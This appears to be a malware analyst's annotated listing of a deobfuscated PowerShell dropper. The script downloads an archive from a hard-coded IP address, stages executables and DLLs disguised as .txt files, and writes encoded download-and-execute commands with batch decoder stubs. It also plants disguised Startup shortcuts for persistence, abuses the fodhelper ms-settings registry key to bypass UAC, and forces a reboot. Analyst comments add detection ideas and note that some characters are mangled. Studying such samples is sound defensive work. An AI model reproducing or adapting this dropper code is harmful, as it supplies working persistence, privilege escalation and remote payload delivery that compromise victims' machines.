- # Analyst note: string table left by the deobfuscation pass. Every literal the
- # dropper uses is bound to a numbered variable here and referenced further down.
- # NOTE(review): later in the listing several separator characters look mangled
- # by the extraction (a stray 'a' or 'b' where a path or switch separator would
- # be expected), so read this as an analysis artefact, not as runnable code.
- ${var0} = 'cmd'
- ${var1} = 'exe'
- ${var2} = '.png'
- ${var3} = 'zip'
- # Indicator: plain-HTTP archive location; it is the first argument of the
- # WebClient.DownloadFile call near the end of the listing.
- ${var4} = 'http://51.38.235.152/20/a/m/m.zip'
- # var5..var7 build the public profile directory, where the marker file and the
- # generated .cmd stubs are written.
- ${var5} = 'public'
- ${var6} = 'c:\users\'
- ${var7} = "${var6}${var5}"
- # var10..var15 are not referenced anywhere else in this listing.
- # NOTE(review): '#NoTrayIcon' and 'DllCall' look like AutoIt keywords; confirm
- # against the contents of the downloaded archive.
- ${var10} = 'Global'
- ${var11} = 'DllCall'
- ${var12} = 'STRUCT'
- ${var13} = 'JLI_GetStdArgc'
- ${var14} = 'DllOpen'
- ${var15} = '#NoTrayIcon'
- # Per-user ms-settings handler key plus fodhelper.exe names. var16, var18 and
- # var19 feed the registry writes at the end of the listing; var17 is unused.
- ${var16} = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'
- ${var17} = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "'
- ${var18} = 'DelegateExecute'
- ${var19} = '(default)'
- ${var20} = 'C:\Windows\System32\fodhelper.exe'
- ${var21} = 'fodhelper.exe'
- # Note the space after "Windows": a look-alike of the real system directory.
- # The script creates it and copies fodhelper.exe into it further down.
- ${var22} = '\\?\C:\Windows \System32\'
- # var23 is not referenced again in this listing.
- ${var23} = '1n ia'
- ${var24} = 'C:\'
- # Extensions and base names used by the Rename-Item calls that run after the
- # archive is expanded: files arrive as .txt and are renamed to .exe / .dll.
- ${var25} = '.txt'
- ${var26} = '.dll'
- ${var27} = '.exe'
- ${var28} = 'jli'
- ${var29} = 'MSVCR100'
- ${var30} = 'WebView2Loader'
- # Host name; it is embedded in the names of the dropped files.
- ${var31} = $env:COMPUTERNAME
- # Name of the marker file written under the public profile directory.
- ${var32} = "030723"
- # Builds the random name used for the staging folder and the dropped files.
- # Returns: "_" + six letters picked from var33 + one "<digit>_" token from
- # var34 + one upper-cased letter from var33, e.g. "_qwerty5_K" (constructed
- # sample). The letter list omits i, l and o, and the digit is 2-9.
- # Detection idea derived from this code (validate before use): a folder
- # directly under C:\ whose name matches ^_[a-z]{6}[2-9]_[A-Z]$.
- Function ____bbbbbbbbaaababababa_____ {
- ${var33} = "q","w","e","r","t","y","u","p","a","s","d","f","g","h","j","k","z","x","c","v","b","n","m"
- ${var34} = "2_","3_","4_","5_","6_","7_","8_","9_"
- ${var35} = $null
- ${var36} = Get-Random -InputObject ${var33} -Count 6
- ${var38} = Get-Random -InputObject ${var34} -Count 1
- ${var40} = Get-Random -InputObject ${var33}.ToUpper() -Count 1
- # Concatenate the three picks in order: letters, digit token, upper-case letter.
- foreach($n in ${var36}) {
- ${var35} += $n
- }
- foreach ($n2 in ${var38}) {
- ${var35} += $n2
- }
- foreach ($n3 in ${var40}) {
- ${var35} += $n3
- }
- return "_${var35}"
- }
- # Staging phase 1: pick the random name, store an encoded command on disk and
- # generate a batch stub that decodes and runs that command.
- ${var49} = ____bbbbbbbbaaababababa_____
- ${var50} = ${var49}
- # Encoded command line. Each "@NN" token is an index into the 36-character
- # "chars" alphabet defined in the batch stub below, which substitutes the
- # tokens back at run time. Read that way, the text is a command that pipes a
- # download-and-execute expression into powershell.exe with profile loading
- # disabled and a window-style argument. The remote location is inside the
- # encoded text. NOTE(review): the 'b' characters in the URL portion look like
- # mangled separators; confirm against the original sample before extracting
- # the host as an indicator.
- ${var52} = "@14@12@17@24 @18@14@33 (@23@14@32-@24@11@19@14@12@29 @23@14@29.@32@14@11@12@21@18@14@23@29).@13@24@32@23@21@24@10@13@28@29@27@18@23@16('@17@29@29@25@28:bb@22@10@18@24@2@3.@12@24@22b@10b@0@8b@1@5@0@8@2@2b@30@25b@30@25') | @25@24@32@14@27@28@17@14@21@21.@14@33@14 -@23@24@25 -@32@18@23 @1 -"
- # Marker file path (public profile directory + "030723"). The branch body is
- # only the placeholder {var57}, so what the original did when the marker
- # exists is not visible here - presumably an early exit; TODO confirm.
- ${var53} = "${var7}a${var32}"
- if ((${var53} | Test-Path)) {var57}
- # Staging folder at the drive root, named with the random string.
- New-Item -ItemType directory -Path "${var24}${var49}"
- # The encoded command is written to a file whose name combines the host name
- # and the random string.
- ${var60} = "${var24}${var49}a${var31}"
- ${var64} = ${var52}
- ${var64} | Set-Content ${var60}${var50}
- # var69, var71 and var73 are assigned but never read in this listing.
- ${var69} = (${var49})
- ${var71} = (${var49} + "A")
- ${var73} = (${var49} + "B")
- # Removes script, shortcut and executable files from the public profile
- # directory - presumably leftovers of an earlier run.
- del ${var7}a*.vbs
- del ${var7}a*.lnk
- del ${var7}a*.exe
- del ${var7}a*.cmd
- # Batch stub written to the public profile directory. It reads the encoded
- # file into an environment variable, replaces each index 10..36 with the
- # matching character of "chars", strips the "@" markers and double quotes,
- # and finally expands the variable as a command line.
- # Detection idea: a .cmd file in the public profile that enables delayed
- # expansion, loads a variable from a file and ends with a bare %variable%.
- ${var79} = "${var7}a${var31}${var50}.${var0}"
- ${var84} = "@Echo off`r`n"
- ${var84} += "Setlocal EnableExtensions`r`n"
- ${var84} += "Setlocal EnableDelayedExpansion`r`n"
- ${var84} += "cd %SystemRoot%aSystem32`r`n"
- ${var84} += "Set bP ${var49}=<`"${var60}${var50}`"`r`n"
- ${var84} += "set chars=0123456789abcdefghijklmnopqrstuvwxyz`r`n"
- ${var84} += "for bL %%N in (10 1 36) do (`r`n"
- ${var84} += "for bF %%C in (`"!chars:~%%N,1!`") do (`r`n"
- ${var84} += "set `"${var49}=!${var49}:%%N=%%C!`"`r`n"
- ${var84} += ")`r`n"
- ${var84} += ")`r`n"
- ${var84} += ")`r`n"
- ${var84} += "for bF %%F in (`"!${var49}!`") do (`r`n"
- ${var84} += "set `"${var49}=!${var49}:@=!`"`r`n"
- ${var84} += ")`r`n"
- ${var84} += "for bF %%F in (`"!${var49}!`") do (`r`n"
- ${var84} += "set `"${var49}=!${var49}:`"=!`"`r`n"
- ${var84} += ")`r`n"
- ${var84} += "%${var49}%`r`n"
- ${var84} | Set-Content ${var79}
- # Shortcut writer no. 1. Saves a .lnk at the path given in var117 (the second
- # parameter, var118, is never read). The shortcut starts the staged
- # "<random>.exe" with the staged "<random>.ai" file as its argument, runs
- # minimised (WindowStyle 7) and borrows the Internet Explorer icon.
- # The finally body is only the placeholder {var138}; the original is not shown.
- function _____ba_baba_bab=aaaaaaaaaabbbbb
- {
- Param([string]${var117},[string]${var118});
- try{
- ${var119} = New-Object -ComObject WScript.Shell
- ${var120} = ${var119}.CreateShortcut(${var117})
- ${var120}.TargetPath = "${var24}${var49}a${var49}.${var1}"
- ${var120}.Arguments = "${var24}${var49}a${var49}.ai"
- ${var120}.WorkingDirectory = "${var24}${var49}a"
- ${var120}.WindowStyle = 7
- ${var120}.IconLocation = '%ProgramFiles%\Internet Explorer\iexplore.exe,1'
- ${var120}.Save()
- }finally{var138}
- }
- # Shortcut writer no. 2. Same shape as the ".ai" variant above it in the
- # listing; the only difference is the argument, the staged "<random>.at"
- # file. var118 is accepted but never read; the finally body is the
- # placeholder {var138}.
- function _____ba_baba_bab=aaaaaaaaaabbbbbaaaaaaaaaaaaaaaaaaaaaaa
- {
- Param([string]${var117},[string]${var118});
- try{
- ${var119} = New-Object -ComObject WScript.Shell
- ${var120} = ${var119}.CreateShortcut(${var117})
- ${var120}.TargetPath = "${var24}${var49}a${var49}.${var1}"
- ${var120}.Arguments = "${var24}${var49}a${var49}.at"
- ${var120}.WorkingDirectory = "${var24}${var49}a"
- ${var120}.WindowStyle = 7
- ${var120}.IconLocation = '%ProgramFiles%\Internet Explorer\iexplore.exe,1'
- ${var120}.Save()
- }finally{var138}
- }
- # Creates the look-alike directory held in var22 (note the space after
- # "Windows") and copies the genuine fodhelper.exe into it.
- # Detection idea: creation of a "Windows " directory with a trailing space at
- # the drive root, or fodhelper.exe appearing outside the real System32.
- ${var163} = "${var22}"
- New-Item ${var163} -ItemType Directory
- Copy-Item -Path "${var20}" -Destination "${var163}${var21}" -Recurse
- # Shortcut writer no. 3. Saves a .lnk at var117 that starts the staged
- # "<random>i7.exe" with no arguments, working directory C:\, minimised
- # (WindowStyle 7), Internet Explorer icon. The same executable path is the
- # value later written into the ms-settings handler key. var118 is never read;
- # the finally body is the placeholder {var138}.
- function _____ba_baba_bab=aaaaaaaaaabbbbbaaaaaaaaaaaaaaaaaaaaaaa____aaa
- {
- Param([string]${var117},[string]${var118});
- try{
- ${var119} = New-Object -ComObject WScript.Shell
- ${var120} = ${var119}.CreateShortcut(${var117})
- ${var120}.TargetPath = "${var24}${var49}a${var49}i7${var27}"
- ${var120}.Arguments = ""
- ${var120}.WorkingDirectory = "${var24}"
- ${var120}.WindowStyle = 7
- ${var120}.IconLocation = '%ProgramFiles%\Internet Explorer\iexplore.exe,1'
- ${var120}.Save()
- }finally{var138}
- }
- # Shortcut writer no. 4. Saves a .lnk at var117 whose target is whatever
- # var79 holds when the function is called - in this listing, the path of a
- # generated .cmd decoder stub. No arguments or working directory, minimised
- # (WindowStyle 7), Internet Explorer icon. var118 is never read; the finally
- # body is the placeholder {var138}.
- function _____ba_baba_bab=a
- {
- Param([string]${var117},[string]${var118});
- try{
- ${var119} = New-Object -ComObject WScript.Shell
- ${var120} = ${var119}.CreateShortcut(${var117})
- ${var120}.TargetPath = "${var79}"
- ${var120}.Arguments = ""
- ${var120}.WorkingDirectory = ""
- ${var120}.WindowStyle = 7
- ${var120}.IconLocation = '%ProgramFiles%\Internet Explorer\iexplore.exe,1'
- ${var120}.Save()
- }finally{var138}
- }
- # Persistence: resolves the current user's Startup folder, clears older
- # script, shortcut and executable files from it, then drops four shortcuts
- # there using the writer functions defined earlier.
- # Detection idea: .lnk files created in the Startup folder by powershell.exe,
- # all carrying the Internet Explorer icon but pointing at a folder under C:\
- # or at a .cmd file in the public profile.
- ${var203} = New-Object -Com WScript.Shell
- ${var204} = ${var203}.SpecialFolders.Item('startup');
- del ${var204}a*.vbs
- del ${var204}a*.lnk
- del ${var204}a*.exe
- del ${var204}a*.cmd
- # var211 and var212 are never assigned in this listing, and the writer
- # functions ignore their second parameter, so this value has no visible effect.
- ${var210} = " $env:APPDATAa${var211}, ${var212}"
- ${var213} = "${var204}a${var49}.lnk"
- _____ba_baba_bab=a ${var213} ${var210}
- ${var213} = "${var204}a${var49}EX.lnk"
- _____ba_baba_bab=aaaaaaaaaabbbbb ${var213} ${var210}
- ${var213} = "${var204}a${var49}AT.lnk"
- _____ba_baba_bab=aaaaaaaaaabbbbbaaaaaaaaaaaaaaaaaaaaaaa ${var213} ${var210}
- ${var213} = "${var204}a${var49}AA.lnk"
- _____ba_baba_bab=aaaaaaaaaabbbbbaaaaaaaaaaaaaaaaaaaaaaa____aaa ${var213} ${var210}
- # Staging phase 2: a second encoded command. It matches the first one except
- # for the last two path segments of the encoded URL.
- ${var52} = "@14@12@17@24 @18@14@33 (@23@14@32-@24@11@19@14@12@29 @23@14@29.@32@14@11@12@21@18@14@23@29).@13@24@32@23@21@24@10@13@28@29@27@18@23@16('@17@29@29@25@28:bb@22@10@18@24@2@3.@12@24@22b@10b@0@8b@1@5@0@8@2@2b@10@30b@10@30') | @25@24@32@14@27@28@17@14@21@21.@14@33@14 -@23@24@25 -@32@18@23 @1 -"
- # Self-assignment; has no effect.
- ${var49} = ${var49}
- # Same file layout as phase 1, with a trailing "y" on the file names.
- ${var60} = "${var24}${var49}a${var31}"
- ${var64} = ${var52}
- ${var64} | Set-Content ${var60}${var50}y
- ${var69} = (${var49})
- ${var71} = (${var49} + "A")
- ${var73} = (${var49} + "B")
- # Second batch decoder stub; the text is the same as the first one except
- # that it reads the "y" file. var79 is overwritten with the new stub path.
- ${var79} = "${var7}a${var31}${var50}y.${var0}"
- ${var84} = "@Echo off`r`n"
- ${var84} += "Setlocal EnableExtensions`r`n"
- ${var84} += "Setlocal EnableDelayedExpansion`r`n"
- ${var84} += "cd %SystemRoot%aSystem32`r`n"
- ${var84} += "Set bP ${var49}=<`"${var60}${var50}y`"`r`n"
- ${var84} += "set chars=0123456789abcdefghijklmnopqrstuvwxyz`r`n"
- ${var84} += "for bL %%N in (10 1 36) do (`r`n"
- ${var84} += "for bF %%C in (`"!chars:~%%N,1!`") do (`r`n"
- ${var84} += "set `"${var49}=!${var49}:%%N=%%C!`"`r`n"
- ${var84} += ")`r`n"
- ${var84} += ")`r`n"
- ${var84} += ")`r`n"
- ${var84} += "for bF %%F in (`"!${var49}!`") do (`r`n"
- ${var84} += "set `"${var49}=!${var49}:@=!`"`r`n"
- ${var84} += ")`r`n"
- ${var84} += "for bF %%F in (`"!${var49}!`") do (`r`n"
- ${var84} += "set `"${var49}=!${var49}:`"=!`"`r`n"
- ${var84} += ")`r`n"
- ${var84} += "%${var49}%`r`n"
- ${var84} | Set-Content ${var79}
- # Shortcut writer no. 5. The body matches the earlier writer whose target is
- # var79; by the time this one is called, var79 holds the path of the second
- # ("y") decoder stub. Saves a minimised (WindowStyle 7) .lnk at var117 with
- # the Internet Explorer icon. var118 is never read; the finally body is the
- # placeholder {var138}.
- function _____ba_baba_bab=abb
- {
- Param([string]${var117},[string]${var118});
- try{
- ${var119} = New-Object -ComObject WScript.Shell
- ${var120} = ${var119}.CreateShortcut(${var117})
- ${var120}.TargetPath = "${var79}"
- ${var120}.Arguments = ""
- ${var120}.WorkingDirectory = ""
- ${var120}.WindowStyle = 7
- ${var120}.IconLocation = '%ProgramFiles%\Internet Explorer\iexplore.exe,1'
- ${var120}.Save()
- }finally{var138}
- }
- # Fifth Startup shortcut ("<random>y.lnk"), pointing at the second decoder stub.
- ${var203} = New-Object -Com WScript.Shell
- ${var204} = ${var203}.SpecialFolders.Item('startup');
- ${var210} = " $env:APPDATAa${var211}, ${var212}"
- ${var213} = "${var204}a${var49}y.lnk"
- _____ba_baba_bab=abb ${var213} ${var210}
- # Writes the random name into the marker file (public profile + "030723")
- # three times, using three different write mechanisms. This is the same path
- # that is tested with Test-Path near the top of the listing.
- ${var315} = ${var49}
- ${var315} | Set-Content "${var7}a${var32}"
- ${var315} | Out-File "${var7}a${var32}"
- ${var315} > "${var7}a${var32}"
- # Fetches the archive from the plain-HTTP URL in var4 into the staging folder
- # under a non-archive extension, renames it to .zip and expands it in place.
- ${var326} = new-object System.Net.WebClient
- ${var326}.DownloadFile(${var4},"${var24}${var49}a${var49}.${var49}")
- Rename-Item -NewName ("${var24}${var49}a${var49}.zip") -Path ("${var24}${var49}a${var49}.${var49}")
- Expand-Archive -Path "${var24}${var49}a${var49}.${var3}" -DestinationPath "${var24}${var49}"
- # Every archive member arrives with a .txt extension and is renamed on disk to
- # its working name (.exe, .dll, .ia, .ai, .at, .mdat), so inspection keyed on
- # file extension would not flag the download.
- # NOTE(review): an executable staged next to DLLs named jli, MSVCR100 and
- # WebView2Loader looks like a DLL side-loading layout; confirm by examining
- # the archive contents.
- Rename-Item -NewName ("${var24}${var49}a${var49}.${var1}") -Path ("${var24}${var49}a${var1}${var25}")
- Rename-Item -NewName ("${var24}${var49}a${var49}.ia") -Path ("${var24}${var49}a6${var25}")
- Rename-Item -NewName ("${var24}${var49}a${var49}.ai") -Path ("${var24}${var49}ab${var25}")
- Rename-Item -NewName ("${var24}${var49}a${var49}.at") -Path ("${var24}${var49}ac${var25}")
- Rename-Item -NewName ("${var24}${var49}a${var49}.mdat") -Path ("${var24}${var49}aat${var25}")
- Rename-Item -NewName ("${var24}${var49}a${var49}i7${var27}") -Path ("${var24}${var49}ai7${var25}")
- Rename-Item -NewName ("${var24}${var49}a${var28}${var26}") -Path ("${var24}${var49}a${var28}${var25}")
- Rename-Item -NewName ("${var24}${var49}a${var29}${var26}") -Path ("${var24}${var49}a${var29}${var25}")
- Rename-Item -NewName ("${var24}${var49}a${var30}${var26}") -Path ("${var24}${var49}a${var30}${var25}")
- del ${var24}${var49}a*.zip
- # Creates the per-user ms-settings handler key and an empty DelegateExecute
- # value. Together with the (default) value set below, this is the registry
- # pattern associated with the publicly documented fodhelper.exe UAC bypass.
- # No launch of fodhelper.exe appears in the visible lines.
- # Detection: alert on any write under
- # HKCU\Software\Classes\ms-settings\Shell\Open\command.
- # Mitigation: run users without local admin rights, or set UAC to
- # "Always notify".
- New-Item "${var16}" -Force
- New-ItemProperty -Path "${var16}" -Name "${var18}" -Value "" -Force
- # Points the handler's (default) value at the staged "<random>i7.exe".
- Set-ItemProperty -Path "${var16}" -Name "${var19}" -Value "${var24}${var49}a${var49}i7${var27}" -Force
- # NOTE(review): the option switches look mangled by the extraction; presumably
- # a restart after a 10-second delay, after which the Startup shortcuts would
- # run at the next logon. TODO confirm against the original sample.
- shutdown br bt 10